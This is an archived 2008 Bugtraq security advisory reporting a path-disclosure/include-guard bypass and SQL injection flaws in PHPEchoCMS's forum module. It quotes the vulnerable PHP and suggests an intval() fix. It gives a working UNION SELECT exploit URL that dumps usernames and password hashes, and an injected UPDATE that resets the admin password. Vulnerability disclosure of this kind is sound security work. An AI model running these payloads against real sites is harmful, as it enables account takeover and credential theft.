PHPEchoCMS Multible remote vulnerabilitis

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHPEchoCMS Multible remote vulnerabilitis
From: security@xxxxxxxxx
Date: 17 Jan 2008 05:07:58 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hello,,

PHPEchoCMS Multible remote vulnerabilitis

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@xxxxxxxxx


fiest thing ..
full path
kernel/init.php
modules/admin/index.php
..
every file to be included has to have the value of the variable $BASE_LOAD
but if the register globals is on then you can use in the browser like this ..
modules/files/index.php?BASE_LOAD=1

it will continue .. and other files too

modules/forum/index.php
lines [31-49]
    if (@$_POST['post']=='thread')
    {
        if (@$_POST['id'] && $_POST['title'] && $_POST['contents'])
        {
                    // Add the thread to the specified section
             $ins = "INSERT INTO `".PREFIX."threads` VALUES ('', 
'".addslashes($_POST['id'])."', '-1', '".addslashes($_POST['title']).
              "', '".str_replace("\n", "<br>", 
addslashes($_POST['contents']))."', '".$_SESSION['username']."','".date("d-m-Y 
H:i")."', '0')";
              $res = query($ins, 1);
              $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y 
H:i")." WHERE `id`=".addslashes($_POST['id']);
              $res = query($ins, 1);
              $nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);
              redirect ("index.php?module=forum&show=thread&id=".$nb);
         }
         else
         {
              $content = $mlang['017'];

         }
    }

see
              $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y 
H:i")." WHERE `id`=".addslashes($_POST['id']);

could be modified to an update query by posting value of id as next
id=union update members set password=[value] where id=1

offcourse value here should be md5 hash .. and no brackets so the query will be 
ok :)


lines[138-142]

    elseif (@$_GET['show']=='thread' && $_GET['id'])
    {
             // Show a thread and its replies (child-threads)

            $thread = query("SELECT * FROM `".PREFIX."threads` WHERE 
id=".addslashes($_GET['id']), 4);

replace with
    elseif (@$_GET['show']=='thread' && $_GET['id'])
    {
             // Show a thread and its replies (child-threads)

            $thread = query("SELECT * FROM `".PREFIX."threads` WHERE 
id='".intval($_GET['id'])."'", 4);


exploit
index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/*



# WwW.SoQoR.NeT

Prev by Date: JoomlaFlash Component Multiple Remote File Inclusion
Next by Date: rPSA-2008-0018-1 mysql mysql-bench mysql-server
Previous by thread: JoomlaFlash Component Multiple Remote File Inclusion
Next by thread: rPSA-2008-0018-1 mysql mysql-bench mysql-server
Index(es):
- Date
- Thread